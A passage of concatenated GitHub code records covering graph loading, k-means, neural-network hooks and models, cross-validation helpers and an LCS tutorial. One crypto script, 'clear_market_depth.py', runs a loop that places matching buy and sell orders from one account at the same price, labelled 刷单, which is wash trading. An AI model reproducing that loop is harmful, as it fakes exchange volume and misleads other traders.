\"adj_time_list.pickle\"), \"rb\") as handle:\n adj_time_list = pkl.load(handle,encoding=\"latin1\")\n \n graphs = []\n for i in range(len(adj_time_list)):\n G = nx.from_scipy_sparse_matrix(adj_time_list[i], create_using=nx.MultiGraph)\n graphs.append(G)\n print(\"Loaded {} graphs \".format(len(graphs)))\n adjs = [nx.adjacency_matrix(g) for g in graphs] # Sparse matrix\n # check = [np.sum(adj_time_list[j] != adjs[j]) for j in range(len(graphs))]\n # print(check)\n return graphs, adjs\n\n\n\nif __name__ == \"__main__\":\n dataset = \"Enron\"\n time_steps = 16\n graphs, adjs = load_graphs(dataset)\n # print(len(adjs))\n # print(adjs[0])\n # print(graphs[0][0])\n # print([graph.number_of_nodes() for graph in graphs])\n\n graphs, adjs = load_graphs_new(\"enron10\")\n # print([graph.number_of_nodes() for graph in graphs])\n eval_idx = len(graphs) - 2\n eval_graph = graphs[eval_idx]\n next_graph = graphs[eval_idx+1]\n print(eval_idx)","repo_name":"jinningli/CS562-RTSGNN","sub_path":"baseline/DySAT/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42092967792","text":"import json\r\nimport time\r\n\r\nimport requests\r\n\r\nfrom tools.Config import befinx_base_url, Trade_url\r\nfrom market_maker.bitget_marketmaker import buy, sell\r\nfrom tools.get_market_info import get_currentprice0\r\n\r\n# # taker买卖单\r\n# userUuid = \"4c39e2dfa2844548be76dbd7b6183c47\"\r\n# apiAccountId1 = 10129\r\n# apiAccountId2 = 10129\r\n# platform = \"befinx\"\r\n# symbol = \"gech_sgdt\"\r\n# strategyId = 888\r\n#\r\n# url = \"{}/open-api/open/trade_plate\".format(befinx_base_url)\r\n# res = requests.post(url, data={\"symbol\": symbol.replace(\"_\", \"/\").upper(), \"size\": 200})\r\n# dict = json.loads(res.content.decode())\r\n# befinxdict = {\"platform\": \"befinx\", \"symbol\": symbol}\r\n# ask = dict[\"data\"][\"ask\"]\r\n# bid = dict[\"data\"][\"bid\"]\r\n# print(ask)\r\n# print(bid)\r\n# for i in ask:\r\n# amount = i[\"amount\"]\r\n# price = i[\"price\"]\r\n# buy(userUuid, apiAccountId1, strategyId, platform, symbol, amount, price)\r\n# time.sleep(0.2)\r\n# for i in bid:\r\n# amount = i[\"amount\"]\r\n# price = i[\"price\"]\r\n# sell(userUuid, apiAccountId2, strategyId, platform, symbol, amount, price)\r\n# time.sleep(0.2)\r\n\r\n\r\n# 撤销数据库订单\r\n\r\n# symbol = \"btc_usdt\"\r\n# res1 = r1.hgetall(\"befinx_{}_buyorders\".format(symbol))\r\n# res1 = [json.loads(i) for i in res1.values()]\r\n# res2 = r1.hgetall(\"befinx_{}_sellorders\".format(symbol))\r\n# res2 = [json.loads(i) for i in res2.values()]\r\n#\r\n# print(res1)\r\n# print(res2)\r\n# for item in res1+res2:\r\n# print(item)\r\n# if item[\"userUuid\"] == \"4c39e2dfa2844548be76dbd7b6183c47\":\r\n# cancel_1(item[\"userUuid\"], item[\"apiAccountId\"], item[\"strategyId\"], item[\"platform\"], item[\"symbol\"], item[\"orderId\"], item[\"direction\"])\r\n# print(\"****************\")\r\n# time.sleep(1)\r\n\r\n\r\n# 查询redis中的订单,成交的话就删除\r\n# symbol = \"mac_sgdt\"\r\n# symbol = \"gech_sgdt\"\r\n# # symbol = \"eth_usdt\"\r\n# res1 = r1.hgetall(\"befinx_{}_buyorders\".format(symbol))\r\n# res1 = [json.loads(i) for i in res1.values()]\r\n# res2 = r1.hgetall(\"befinx_{}_sellorders\".format(symbol))\r\n# res2 = [json.loads(i) for i in res2.values()]\r\n#\r\n# print(res1)\r\n# print(res2)\r\n\r\n\r\n# for item in res1+res2:\r\n# print(item)\r\n# userUuid = item[\"userUuid\"]\r\n# apiAccountId = item[\"apiAccountId\"]\r\n# strategyId = item[\"strategyId\"]\r\n# platform = item[\"platform\"]\r\n# orderId = item[\"orderId\"]\r\n# direction = item[\"direction\"]\r\n# try:\r\n# data = {\"userUuid\": userUuid,\r\n# \"apiAccountId\": apiAccountId,\r\n# \"strategyId\": strategyId,\r\n# \"platform\": platform,\r\n# \"symbol\": symbol,\r\n# \"orderId\": orderId,\r\n# \"direction\": direction,\r\n# \"source\": 8}\r\n# res = requests.post(Queryorder_url, data=data)\r\n# resdict = json.loads(res.content.decode())\r\n# print(resdict)\r\n# status = resdict[\"response\"][\"status\"]\r\n# print(\"用户{}-{},订单{},状态{}\".format(userUuid, apiAccountId, orderId, status))\r\n# if status == \"closed\" or status == \"cancelled\": # 状态 open挂单中 closed已完成 cancelled撤单 part部分交易\r\n# if direction == 1:\r\n# r1.hdel(\"befinx_{}_buyorders\".format(symbol), orderId)\r\n# if direction == 2:\r\n# r1.hdel(\"befinx_{}_sellorders\".format(symbol), orderId)\r\n# except Exception as e:\r\n# print(\"用户{}-{}查询订单{}失败,报错信息{}\".format(userUuid, apiAccountId, orderId, e))\r\n# if direction == 1:\r\n# r1.hdel(\"befinx_{}_buyorders\".format(symbol), orderId)\r\n# if direction == 2:\r\n# r1.hdel(\"befinx_{}_sellorders\".format(symbol), orderId)\r\n# time.sleep(1)\r\n#\r\n# for item in res1+res2:\r\n# print(item)\r\n# userUuid = item[\"userUuid\"]\r\n# apiAccountId = item[\"apiAccountId\"]\r\n# strategyId = item[\"strategyId\"]\r\n# platform = item[\"platform\"]\r\n# orderId = item[\"orderId\"]\r\n# direction = item[\"direction\"]\r\n# try:\r\n# data = {\"userUuid\": userUuid,\r\n# \"apiAccountId\": apiAccountId,\r\n# \"strategyId\": strategyId,\r\n# \"platform\": platform,\r\n# \"symbol\": symbol,\r\n# \"orderId\": orderId,\r\n# \"source\": 8}\r\n# res = requests.post(Cancel_url, data=data)\r\n# resdict = json.loads(res.content.decode())\r\n# print(resdict)\r\n# if resdict[\"code\"] == 1:\r\n# if direction == 1:\r\n# r1.hdel(\"befinx_{}_buyorders\".format(symbol), orderId)\r\n# print(\"用户{}-{},撤销买单{},返回{}\".format(userUuid, apiAccountId, orderId, resdict))\r\n# if direction == 2:\r\n# r1.hdel(\"befinx_{}_sellorders\".format(symbol), orderId)\r\n# print(\"用户{}-{},撤销卖单{},返回{}\".format(userUuid, apiAccountId, orderId, resdict))\r\n# except Exception as e:\r\n# print(\"用户{}-{}撤销订单{}失败,报错信息{}\".format(userUuid, apiAccountId, orderId, e))\r\n# time.sleep(1)\r\n\r\n\r\n# url = \"{}/open-api/open/trade_plate\".format(befinx_base_url)\r\n# res = requests.post(url, data={\"symbol\": symbol.replace(\"_\", \"/\").upper(), \"size\": 200})\r\n# dict = json.loads(res.content.decode())\r\n# befinxdict = {\"platform\": \"befinx\", \"symbol\": symbol}\r\n# ask = dict[\"data\"][\"ask\"]\r\n# bid = dict[\"data\"][\"bid\"]\r\n# print(ask)\r\n# print(bid)\r\n\r\n# from databasePool import POOL_grid\r\n# direction = 2\r\n# conn = POOL_grid.connection()\r\n# cur = conn.cursor()\r\n# cur.execute(\"SELECT orderid FROM `t_balance_order_record`\")\r\n# res = cur.fetchall()\r\n# print(res)\r\n#\r\n# n = 1\r\n# for i in res:\r\n# orderId = i[0]\r\n# print(n,orderId)\r\n# print(\"================================撤单====================================\", int(time.time()))\r\n# cancelparams = {\"direction\": direction, \"symbol\": symbol, \"platform\": platform, \"orderId\": orderId,\r\n# \"apiAccountId\": apiAccountId, \"userUuid\": userUuid, \"source\": source, \"strategyId\": strategyId}\r\n# cancelres = requests.post(Cancel_url, data=cancelparams)\r\n# print(cancelres.url)\r\n# resdict = json.loads(cancelres.content.decode())\r\n# print(resdict)\r\n# n+=1\r\n\r\n\r\n# 测试\r\n\r\nwhile True:\r\n try:\r\n # userUuid = \"398051ac70ef4da9aafd33ce0b95195f\"\r\n # apiAccountId = 10152 # \"btc 总余额122.73294,其中可用122.73294,锁定0.0,usdt总余额487713.34,其中可用482713.3锁定5000.039\"\r\n userUuid = \"6e7c88272f554956a35d8ed2cf833201\"\r\n apiAccountId = 10155\r\n strategyId = 88888888888\r\n platform = \"befinx\"\r\n symbol = \"btc_usdt\"\r\n amount = 0.0001\r\n url = \"{}/open-api/open/trade_plate\".format(befinx_base_url)\r\n res = requests.post(url, data={\"symbol\": symbol.replace(\"_\", \"/\").upper(), \"size\": 200})\r\n dict = json.loads(res.content.decode())\r\n try:\r\n ask = [i for i in dict[\"data\"][\"ask\"] if i[\"price\"] >= 10000]\r\n bid = [i for i in dict[\"data\"][\"bid\"] if i[\"price\"] >= 10000]\r\n except:\r\n ask = []\r\n bid = []\r\n current_price = get_currentprice0(\"okex\", \"btc_usdt\")\r\n if ask == [] and bid == []:\r\n # 刷单(参考okex的价格)\r\n if current_price != 0:\r\n buyparams = {\"direction\": 1, \"amount\": amount, \"symbol\": symbol, \"platform\": platform,\r\n \"price\": current_price,\r\n \"apiAccountId\": apiAccountId, \"userUuid\": userUuid, \"source\": 7, \"strategyId\": strategyId}\r\n buytrade = requests.post(Trade_url, data=buyparams)\r\n sellparams = {\"direction\": 2, \"amount\": amount, \"symbol\": symbol, \"platform\": platform,\r\n \"price\": current_price,\r\n \"apiAccountId\": apiAccountId, \"userUuid\": userUuid, \"source\": 7,\r\n \"strategyId\": strategyId}\r\n selltrade = requests.post(Trade_url, data=sellparams)\r\n else:\r\n for i in ask:\r\n amount = i[\"amount\"]\r\n price = i[\"price\"]\r\n if abs(price - current_price) / current_price < 0.0005:\r\n buy(userUuid, apiAccountId, strategyId, platform, symbol, amount, price)\r\n time.sleep(1)\r\n for i in bid:\r\n amount = i[\"amount\"]\r\n price = i[\"price\"]\r\n if abs(price - current_price) / current_price < 0.0005:\r\n sell(userUuid, apiAccountId, strategyId, platform, symbol, amount, price)\r\n time.sleep(1)\r\n except Exception as e:\r\n print(e)\r\n finally:\r\n time.sleep(1)\r\n","repo_name":"mujinveil/blockchain_quant","sub_path":"market_maker/clear_market_depth.py","file_name":"clear_market_depth.py","file_ext":"py","file_size_in_byte":8721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"14545277494","text":"import statistics as s\r\nimport math as m\r\na=[]\r\nprint(\"enter c ordinate\")\r\np=int(input())\r\nfor i in range(p):\r\n x=float(input())\r\n y=float(input())\r\n a+=[[x,y]]\r\n\r\nn=int(input(\"enter no of cluseters\"))\r\nkold=[]\r\nknew=[]\r\ndef my_comp(point1):\r\n return point1[0]*point1[0] + point1[1]*point1[1]\r\na.sort(key=my_comp)\r\nprint(a)\r\nfor i in range(n):\r\n k=a[i*len(a)//n:(i+1)*len(a)//n]\r\n l=len(k)\r\n x=0\r\n y=0\r\n for j in range(l):\r\n x+=int(k[j][0])\r\n y+=int(k[j][1])\r\n kold+=[(x/l,y/l)]\r\nknew = kold\r\nnon=[0*2]*n\r\nk1=[0]*n\r\nk2=[0]*n\r\nfor i in range(len(a)):\r\n dist=[]\r\n for j in range(n):\r\n dist+=[m.sqrt( (knew[j][0]-a[i][0])**2 + (knew[j][1]-a[i][1])**2 )]\r\n print(a[i],\"is in cluseter:\",dist.index(min(dist))+1)\r\n k1[dist.index(min(dist))]+=a[i][0]\r\n k2[dist.index(min(dist))]+=a[i][1]\r\n non[dist.index(min(dist))]+=1\r\nfor i in range(n):\r\n print(k1[i]/non[i],k2[i]/non[i],\" are the centroids\")\r\n\r\n","repo_name":"praneethpillarisetty/k-means","sub_path":"kmeans2d.py","file_name":"kmeans2d.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42831302858","text":"import torch\nfrom collections import defaultdict\n\n\ndef register_activation_saver(model, layer_i):\n\n # n_heads = model.config.num_attention_heads\n\n def save_activations(module, m_in, m_out):\n m_in = m_in[0][:, :1]\n batch_size = m_in.shape[0]\n m_in = m_in.view(batch_size, -1)\n model.cache[layer_i].append(m_in.detach().cpu())\n\n layer = model.roberta.encoder.layer[layer_i].intermediate\n layer.register_forward_hook(save_activations)\n\n\ndef register_hooks(model):\n\n n_layers = model.config.num_hidden_layers\n model.cache = [[] for _ in range(n_layers)]\n\n for layer_i in range(n_layers):\n register_activation_saver(model, layer_i)\n\n\ndef get_activations(model, dataloader, head_mask):\n\n register_hooks(model)\n\n for batch in dataloader:\n\n input_ids = batch['input_ids'].to(model.device, non_blocking=True)\n input_mask = batch['attention_mask'].to(model.device, non_blocking=True)\n label_ids = batch['labels'].to(model.device, non_blocking=True)\n\n with torch.no_grad():\n model(input_ids,\n token_type_ids=None,\n attention_mask=input_mask,\n labels=label_ids,\n head_mask=head_mask)\n\n activations = []\n for layer in model.cache:\n activations.append(torch.cat(layer, dim=0))\n activations = torch.stack(activations, dim=0)\n\n return activations\n","repo_name":"apostolikas/Language-Specific-Subnetworks","sub_path":"utils/head_activations.py","file_name":"head_activations.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17061872109","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 26 20:14:36 2015\n\n@author: grigoriykoytiger\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport scipy.stats as stats\noutputFolder = '../output/Presentation/'\n\nallPredictions = pd.read_csv('../output/tcga/2015-07-23/all_predictions.csv', index_col =0, na_values = ['[Not Available]', '[Not Applicable]', '[Unknown]'])\nallPredictions = allPredictions.ix[~np.isnan(allPredictions['AFATINIB']),:]\n\ngemcitabineResults = allPredictions.ix[allPredictions['pharmaceutical_therapy_drug_name'] == 'GEMCITABINE',:]\ngemcitabineResultsLung = gemcitabineResults.ix[(gemcitabineResults['cancer_type'] == 'LUAD') | (gemcitabineResults['cancer_type'] == 'LUSC'),:]\n\nax = sns.boxplot(x=\"tumor_status\", y='GEMCITABINE', data=gemcitabineResultsLung) \nax = sns.stripplot(x=\"tumor_status\", y='GEMCITABINE', data=gemcitabineResultsLung, jitter=False, edgecolor=\"gray\", alpha=.7, size=5)\nfigure = ax.get_figure()\nfigure.savefig(outputFolder + 'GEMCITABINE' + '_tumor_status.pdf')\nax.clear()\n\nwithTumorPrediction = gemcitabineResultsLung.ix[gemcitabineResultsLung['tumor_status'] == 'WITH TUMOR', 'GEMCITABINE']\nwithoutTumorPrediction = gemcitabineResultsLung.ix[gemcitabineResultsLung['tumor_status'] == 'TUMOR FREE', 'GEMCITABINE']\nstats.ranksums(withTumorPrediction, withoutTumorPrediction)\n\nroc_auc_score(np.hstack((np.repeat(0,6), np.repeat(1,12))), np.hstack((withoutTumorPrediction, withTumorPrediction)))\nroc_data = pd.DataFrame()\nroc_data['fpr'], roc_data['tpr'],roc_data['thresholds'] = roc_curve(np.hstack((np.repeat(0,6), np.repeat(1,12))), np.hstack((withoutTumorPrediction, withTumorPrediction)))\nroc_data.plot(x='fpr', y='tpr').get_figure().savefig(outputFolder + 'gemcitabine_ROC_Curve.pdf')\n\n\n\ndoxorubicinResults = allPredictions.ix[allPredictions['pharmaceutical_therapy_drug_name'] == 'DOXORUBICIN',:]\n\n\n#Cross validation graphic\ninput_dir = '2015-07-20/cross_validation/'\ncross_validation_statistics = pd.read_csv(input_dir + 'cross_validation_statistics.csv')\n\nfigure = sns.distplot(cross_validation_statistics['Spearman rho'], bins=[-.05, 0, .05, .1, .15, .2, .25, .3, .35], kde=False).get_figure()\n\nfigure.savefig(outputFolder + 'cross_validation_histogram.pdf')\n","repo_name":"gkoytiger/OncologyOracle","sub_path":"createPresentationFigures.py","file_name":"createPresentationFigures.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31940358859","text":"from enum import IntEnum\nfrom typing import Any, Dict, List, Optional, Tuple, Union\n\nimport numpy as np\n\nfrom sklearn.model_selection import (\n KFold,\n ShuffleSplit,\n StratifiedKFold,\n StratifiedShuffleSplit,\n TimeSeriesSplit,\n train_test_split\n)\n\nfrom typing_extensions import Protocol\n\n\n# Use callback protocol as workaround, since callable with function fields count 'self' as argument\nclass CROSS_VAL_FN(Protocol):\n def __call__(self,\n num_splits: int,\n indices: np.ndarray,\n stratify: Optional[Any]) -> List[Tuple[np.ndarray, np.ndarray]]:\n ...\n\n\nclass HOLDOUT_FN(Protocol):\n def __call__(self, val_share: float, indices: np.ndarray, stratify: Optional[Any]\n ) -> Tuple[np.ndarray, np.ndarray]:\n ...\n\n\nclass CrossValTypes(IntEnum):\n stratified_k_fold_cross_validation = 1\n k_fold_cross_validation = 2\n stratified_shuffle_split_cross_validation = 3\n shuffle_split_cross_validation = 4\n time_series_cross_validation = 5\n\n\nclass HoldoutValTypes(IntEnum):\n holdout_validation = 6\n stratified_holdout_validation = 7\n\n\nDEFAULT_RESAMPLING_PARAMETERS = {\n HoldoutValTypes.holdout_validation: {\n 'val_share': 0.33,\n },\n HoldoutValTypes.stratified_holdout_validation: {\n 'val_share': 0.33,\n },\n CrossValTypes.k_fold_cross_validation: {\n 'num_splits': 3,\n },\n CrossValTypes.stratified_k_fold_cross_validation: {\n 'num_splits': 3,\n },\n CrossValTypes.shuffle_split_cross_validation: {\n 'num_splits': 3,\n },\n CrossValTypes.time_series_cross_validation: {\n 'num_splits': 3,\n },\n} # type: Dict[Union[HoldoutValTypes, CrossValTypes], Dict[str, Any]]\n\n\ndef get_cross_validators(*cross_val_types: CrossValTypes) -> Dict[str, CROSS_VAL_FN]:\n cross_validators = {} # type: Dict[str, CROSS_VAL_FN]\n for cross_val_type in cross_val_types:\n cross_val_fn = globals()[cross_val_type.name]\n cross_validators[cross_val_type.name] = cross_val_fn\n return cross_validators\n\n\ndef get_holdout_validators(*holdout_val_types: HoldoutValTypes) -> Dict[str, HOLDOUT_FN]:\n holdout_validators = {} # type: Dict[str, HOLDOUT_FN]\n for holdout_val_type in holdout_val_types:\n holdout_val_fn = globals()[holdout_val_type.name]\n holdout_validators[holdout_val_type.name] = holdout_val_fn\n return holdout_validators\n\n\ndef is_stratified(val_type: Union[str, CrossValTypes, HoldoutValTypes]) -> bool:\n if isinstance(val_type, str):\n return val_type.lower().startswith(\"stratified\")\n else:\n return val_type.name.lower().startswith(\"stratified\")\n\n\ndef holdout_validation(val_share: float, indices: np.ndarray, **kwargs: Any) -> Tuple[np.ndarray, np.ndarray]:\n train, val = train_test_split(indices, test_size=val_share, shuffle=False)\n return train, val\n\n\ndef stratified_holdout_validation(val_share: float, indices: np.ndarray, **kwargs: Any) \\\n -> Tuple[np.ndarray, np.ndarray]:\n train, val = train_test_split(indices, test_size=val_share, shuffle=False, stratify=kwargs[\"stratify\"])\n return train, val\n\n\ndef shuffle_split_cross_validation(num_splits: int, indices: np.ndarray, **kwargs: Any) \\\n -> List[Tuple[np.ndarray, np.ndarray]]:\n cv = ShuffleSplit(n_splits=num_splits)\n splits = list(cv.split(indices))\n return splits\n\n\ndef stratified_shuffle_split_cross_validation(num_splits: int, indices: np.ndarray, **kwargs: Any) \\\n -> List[Tuple[np.ndarray, np.ndarray]]:\n cv = StratifiedShuffleSplit(n_splits=num_splits)\n splits = list(cv.split(indices, kwargs[\"stratify\"]))\n return splits\n\n\ndef stratified_k_fold_cross_validation(num_splits: int, indices: np.ndarray, **kwargs: Any) \\\n -> List[Tuple[np.ndarray, np.ndarray]]:\n cv = StratifiedKFold(n_splits=num_splits)\n splits = list(cv.split(indices, kwargs[\"stratify\"]))\n return splits\n\n\ndef k_fold_cross_validation(num_splits: int, indices: np.ndarray, **kwargs: Any) -> List[Tuple[np.ndarray, np.ndarray]]:\n \"\"\"\n Standard k fold cross validation.\n\n :param indices: array of indices to be split\n :param num_splits: number of cross validation splits\n :return: list of tuples of training and validation indices\n \"\"\"\n cv = KFold(n_splits=num_splits)\n splits = list(cv.split(indices))\n return splits\n\n\ndef time_series_cross_validation(num_splits: int, indices: np.ndarray, **kwargs: Any) \\\n -> List[Tuple[np.ndarray, np.ndarray]]:\n \"\"\"\n Returns train and validation indices respecting the temporal ordering of the data.\n Dummy example: [0, 1, 2, 3] with 3 folds yields\n [0] [1]\n [0, 1] [2]\n [0, 1, 2] [3]\n\n :param indices: array of indices to be split\n :param num_splits: number of cross validation splits\n :return: list of tuples of training and validation indices\n \"\"\"\n cv = TimeSeriesSplit(n_splits=num_splits)\n splits = list(cv.split(indices))\n return splits\n","repo_name":"LMZimmer/Auto-PyTorch_refactor","sub_path":"autoPyTorch/datasets/resampling_strategy.py","file_name":"resampling_strategy.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"876343855","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass WOGAN_NN(nn.Module):\n \"\"\"Base class for simple dense neural networks.\"\"\"\n\n def __init__(self, input_shape, hidden_neurons, output_shape, output_activation, hidden_activation, batch_normalization=False, layer_normalization=False):\n super().__init__()\n\n # The dimension of the input vector.\n self.input_shape = input_shape\n # The dimension of the output vector.\n self.output_shape = output_shape\n # List of numbers of neurons in the hidden layers.\n self.hidden_neurons = hidden_neurons\n # Use batch normalization before each activation (except the last one).\n self.batch_normalization = batch_normalization\n # Use layer normalization before each activation (except the last one).\n self.layer_normalization = layer_normalization\n\n if self.batch_normalization and self.layer_normalization:\n raise Exception(\"Cannot use both batch normalization and layer normalization (not recommended).\")\n\n # Map for activations.\n activations = {\"leaky_relu\": F.leaky_relu,\n \"linear\": nn.Identity(),\n \"relu\": F.relu,\n \"sigmoid\": torch.sigmoid,\n \"tanh\": torch.tanh}\n\n # Hidden layer activation.\n if not hidden_activation in activations:\n raise Exception(\"Unknown activation function '{}'.\".format(hidden_activation))\n self.hidden_activation = activations[hidden_activation]\n\n # Output activation.\n if not output_activation in activations:\n raise Exception(\"Unknown activation function '{}'.\".format(output_activation))\n self.output_activation = activations[output_activation]\n\n # We use fully connected layers with the specified number of neurons.\n self.top = nn.Linear(self.input_shape, self.hidden_neurons[0])\n self.hidden = nn.ModuleList()\n if self.batch_normalization:\n self.norm = nn.ModuleList([nn.BatchNorm1d(self.hidden_neurons[0])])\n if self.layer_normalization:\n self.norm = nn.ModuleList([nn.LayerNorm(self.hidden_neurons[0])])\n for i, neurons in enumerate(self.hidden_neurons[1:]):\n self.hidden.append(nn.Linear(self.hidden_neurons[i], neurons))\n if self.batch_normalization:\n self.norm.append(nn.BatchNorm1d(neurons))\n if self.layer_normalization:\n self.norm.append(nn.LayerNorm(neurons))\n self.bottom = nn.Linear(self.hidden_neurons[-1], self.output_shape)\n if self.batch_normalization:\n self.norm.append(nn.BatchNorm1d(self.output_shape))\n if self.layer_normalization:\n self.norm.append(nn.LayerNorm(self.output_shape))\n\n def forward(self, x):\n \"\"\":meta private:\"\"\"\n x = self.hidden_activation(self.top(x))\n for i, L in enumerate(self.hidden):\n L = L.to(x.device)\n if self.batch_normalization or self.layer_normalization:\n x = self.hidden_activation(self.norm[i](L(x)))\n else:\n x = self.hidden_activation(L(x))\n if self.batch_normalization or self.layer_normalization:\n x = self.output_activation(self.norm[-1](self.bottom(x)))\n else:\n x = self.output_activation(self.bottom(x))\n\n return x\n\nclass CriticNetwork(WOGAN_NN):\n \"\"\"Define the neural network model for the WGAN critic.\"\"\"\n\n def __init__(self, input_shape, hidden_neurons, hidden_activation=\"leaky_relu\", batch_normalization=False, layer_normalization=False):\n super().__init__(input_shape=input_shape,\n hidden_neurons=hidden_neurons,\n output_shape=1,\n output_activation=\"linear\",\n hidden_activation=hidden_activation,\n batch_normalization=batch_normalization,\n layer_normalization=layer_normalization\n )\n\nclass GeneratorNetwork(WOGAN_NN):\n \"\"\"Define the neural network model for the WGAN generator.\"\"\"\n\n def __init__(self, noise_dim, hidden_neurons, output_shape, hidden_activation=\"relu\", batch_normalization=False, layer_normalization=False):\n super().__init__(input_shape=noise_dim,\n hidden_neurons=hidden_neurons,\n output_shape=output_shape,\n output_activation=\"tanh\",\n hidden_activation=hidden_activation,\n batch_normalization=batch_normalization,\n layer_normalization=layer_normalization\n )\n\nclass AnalyzerNetwork(WOGAN_NN):\n \"\"\"Define a regression neural network model for the WOGAN analyzer.\"\"\"\n\n def __init__(self, input_shape, hidden_neurons, hidden_activation=\"relu\", layer_normalization=False):\n super().__init__(input_shape=input_shape,\n hidden_neurons=hidden_neurons,\n output_shape=1,\n output_activation=\"sigmoid\",\n hidden_activation=hidden_activation,\n layer_normalization=layer_normalization\n )\n \nclass AnalyzerNetwork_classifier(WOGAN_NN):\n \"\"\"Define a classification neural network model for the WOGAN analyzer.\"\"\"\n\n def __init__(self, classes, input_shape, hidden_neurons):\n # Number of classes.\n self.classes = classes\n super().__init__(input_shape=input_shape,\n hidden_neurons=hidden_neurons,\n output_shape=self.classes,\n output_activation=\"linear\",\n hidden_activation=\"relu\",\n batch_normalization=True\n )\n\nclass AnalyzerNetwork_conv(nn.Module):\n \"\"\"Defines a neural network model for the WOGAN analyzer which uses 1D\n convolution.\"\"\"\n\n def __init__(self, input_shape, feature_maps, kernel_sizes, convolution_activation, dense_neurons):\n \"\"\"\n Creates a convolutional network with the following structure. For each\n number in the list feature_maps, create a 1D convolutional layer with\n the specified number of feature maps followed by a maxpool layer. The\n kernel sizes of the convolutional layer and the maxpool layer are\n specified by the first tuple in kernel_sizes. We use the specified\n activation function after each convolution layer. After the\n convolutions and maxpools, we use a single dense layer of the specified\n size with sigmoid activation.\n\n We always pad K-1 zeros when K is the kernel size. For now, we use a\n stride of 1.\n \"\"\"\n\n super().__init__()\n\n # The dimension of the input vector.\n self.input_shape = input_shape\n # Number of feature maps.\n self.feature_maps = feature_maps\n # Corresponding kernel sizes.\n self.kernel_sizes = kernel_sizes\n # Number of neurons on the bottom dense layer.\n self.dense_neurons = dense_neurons\n\n activations = {\"leaky_relu\": F.leaky_relu,\n \"linear\": nn.Identity(),\n \"relu\": F.relu,\n \"sigmoid\": torch.sigmoid,\n \"tanh\": torch.tanh}\n\n # Convolution activation function.\n if not convolution_activation in activations:\n raise Exception(\"Unknown activation function '{}'.\".format(convolution_activation))\n self.convolution_activation = activations[convolution_activation]\n\n # Define the convolutional layers and maxpool layers. Compute\n # simultaneously the number of inputs for the final dense layer by\n # feeding an input vector through the network.\n self.conv_layers = nn.ModuleList()\n self.maxpool_layers = nn.ModuleList()\n x = torch.zeros(1, 1, self.input_shape)\n C = nn.Conv1d(in_channels=1,\n out_channels=feature_maps[0],\n kernel_size=kernel_sizes[0][0],\n padding=kernel_sizes[0][0]-1\n )\n M = nn.MaxPool1d(kernel_size=kernel_sizes[0][1],\n padding=kernel_sizes[0][1]-1\n )\n x = M(C(x))\n self.conv_layers.append(C)\n self.maxpool_layers.append(M)\n for i, K in enumerate(feature_maps[1:]):\n C = nn.Conv1d(in_channels=feature_maps[i],\n out_channels=K,\n kernel_size=kernel_sizes[i+1][0],\n padding=kernel_sizes[i+1][0]-1\n )\n torch.nn.init.kaiming_uniform_(C.weight)\n M = nn.MaxPool1d(kernel_size=kernel_sizes[i+1][1],\n padding=kernel_sizes[i+1][1]-1\n )\n x = M(C(x))\n self.conv_layers.append(C)\n self.maxpool_layers.append(M)\n\n # Define the final dense layer.\n self.flatten = nn.Flatten()\n I = x.reshape(-1).size()[0]\n self.dense_layer = nn.Linear(I, self.dense_neurons)\n torch.nn.init.xavier_uniform_(self.dense_layer.weight)\n self.bottom = nn.Linear(self.dense_neurons, 1)\n\n def forward(self, x):\n \"\"\":meta private:\"\"\"\n # Reshape to 1 channel.\n x = x.view(x.size()[0], 1, x.size()[1])\n for n in range(len(self.conv_layers)):\n C = self.conv_layers[n].to(x.device)\n M = self.maxpool_layers[n].to(x.device)\n x = self.convolution_activation(C(x))\n x = M(x)\n\n x = self.flatten(x)\n x = self.dense_layer(x)\n x = torch.sigmoid(self.bottom(x))\n\n return x\n","repo_name":"mshaheryarmalik/stgem","sub_path":"stgem/algorithm/wogan/mlm.py","file_name":"mlm.py","file_ext":"py","file_size_in_byte":9845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74885282692","text":"# problem statement: We have given 2 strings, we need to find out the longest common subsequence\n\ns1 = \"abcdghee\"\ns2 = \"abdfhrxzye\"\n\nLCS = \"abdhe\"\n\n\n# s1 = \"abcdghee\"\n# s2 = \"abdfhrxzyeqe\"\n# LCS = \"abdhee\"\n\n\n# Approach ->\n# we will always compare last elements of both the strings\n# now it might be possible that last elements can be equal or not equal\n\n# if last element is equal then we add 1 in answer and call LCS function again by dropping last elements of both\n# the strings\n# so the statement will be -> 1 + LCS(s1, s2, n-1, m-1), n = len(s1) and m = len(s2)\n\n# if last elements are not equal, then here we will have 2 choices\n# 1> take full chars of s1 and drop last element of s2\n# 2> take full chars of s2 and drop last element of s1\n# now from both 1> and 2> get the max out of it from the choices\n\n\n# recursive approach\ndef LCS(s1, s2, n, m):\n \"\"\"\n s1: string 1\n s2: string 2\n n: len(s1)\n m: len(s2)\n \"\"\"\n # base condition (Think of the smallest valid input)\n if n == 0 or m == 0:\n # if any of the string is empty then nothing will be common, so return 0\n return 0\n\n if s1[n - 1] == s2[m - 1]:\n return 1 + LCS(s1, s2, n - 1, m - 1)\n else:\n return max(LCS(s1, s2, n, m - 1), LCS(s1, s2, n - 1, m))\n\n\n# memoized_map = {}\n#\n#\n# # Memoized approach\n# def memoized_LCS(s1, s2, n, m):\n# \"\"\"\n# s1: string 1\n# s2: string 2\n# n: len(s1)\n# m: len(s2)\n# \"\"\"\n# # base condition (Think of the smallest valid input)\n# if n == 0 or m == 0:\n# # if any of the string is empty then nothing will be common, so return 0\n# 